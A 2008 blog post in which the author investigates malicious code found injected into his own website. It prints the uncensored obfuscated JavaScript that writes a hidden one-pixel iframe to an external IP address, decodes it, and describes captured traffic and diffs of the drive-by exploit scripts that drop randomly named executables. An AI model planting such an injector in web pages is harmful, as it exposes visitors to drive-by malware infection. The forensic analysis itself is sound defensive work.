Forensics: Anatomy of a Drive-by-Download Attack
July 5th, 2008 — bjouThe other day I checked a rarely used website of mine for its its source, where I found some suspicious code. It seemed to be some kind of malicious iframe code for drive-by downloads, so I started my investigation on it. Be alarmed: I will NOT censor any of that code, so be sure NOT to visit these websites unless you know what you are doing.
Now here is the obfuscated JavaScript code:
<!-- Nerzul --><script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0035\u0038\u002e\u0036\u0035\u002e\u0032\u0033\u0035\u002e\u0034\u0031\u002f\u006c\u006c\u006c\u006c\u002f\u0073\u0074\u0064\u0073\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u003f\u0073\u0069\u0064\u003d\u0031\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script>
which decodes to
<iframe src="http://58.65.235.41/llll/stds/index.php?sid=1" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Just to be on the safe side, I used a virtual machine, Sandbox Technologies and Wireshark to visit the website and capture the packets. After the HTTP GET request on that site, a “GET /llll/stds/go.php?sid=1 HTTP/1.1\r\n” was executed, which forwarded to “GET /llll/ts/index.php HTTP/1.1\r\n“. This request occurred every 24 seconds. Following every single request, I got a lof of “Continuation or non-HTTP Traffic”, meaning there were some packets on port 80 without the HTTP header. There was a lot of HTTP-data like “Data: 783932494B4148407542324C4E414833563358417A46484D…“, so I decided to use chaosreader to gain some better understanding.
I got this interesting result. In total I got a lot of these obviously heavily obfuscated data, but they did not seem to differ alot. I de-obfuscated them using malzilla and did a “diff” on some of them:
[~/malicious]$diff exploit1 exploit2
177c177
< var fname="winSnp6O4.exe";
---
> var fname="winbtHWMzX7lmTK.exe";
[02:24:01] [~/malicious]$diff exploit2 exploit3
177c177
< var fname="winbtHWMzX7lmTK.exe";
---
> var fname="winIZdWt3zQl5YEQb.exe";
[02:24:06] [~/malicious]$diff exploit3 exploit4
177c177
< var fname="winIZdWt3zQl5YEQb.exe";
---
> var fname="winK6S9dnplSskzh.exe";
So we see, only the filenames changed. Moreover, when analyzing the de-obfuscated JS-code, it can be seen that this file includes nine different exploit vectors, including Microsoft’s MDAC, Webview Folder Icon and DirectAnimation Heap Overflow Vulnerabilities, Macromedia’s Flash Vulnerability and some more that I did not investigate.
The script will start with attack(1);, trying to create Shell Application Objects for several classids and then it will create an ADODB Stream and save the responseBody received via XMLHTTP to a file with the fixed letters “win” followed by some random ones (see above). While debugging the code on my system, creating the shell application object failed (its return value was null), so I haven’t been able to open the stream and analyze that file.
However, after failing of attack1 and attack2 (the swf exploit, the url did not ping), the other exploits were being run, but I did not go further into analysis there…
So now only the question remains, how that code came into the index.html pages of my website. My FTP password is rather strong, so that can’t be it and neither can social engineering or SQL Injections, as it was pure HTML without any DB backend. Waiting for an answer from my webhoster…
August 19th, 2008 at 6:10 pm
[...] Forensics: Anatomy of a Drive-by-Download Attack bei BjOG – Bjou’s Blog, that is! [...]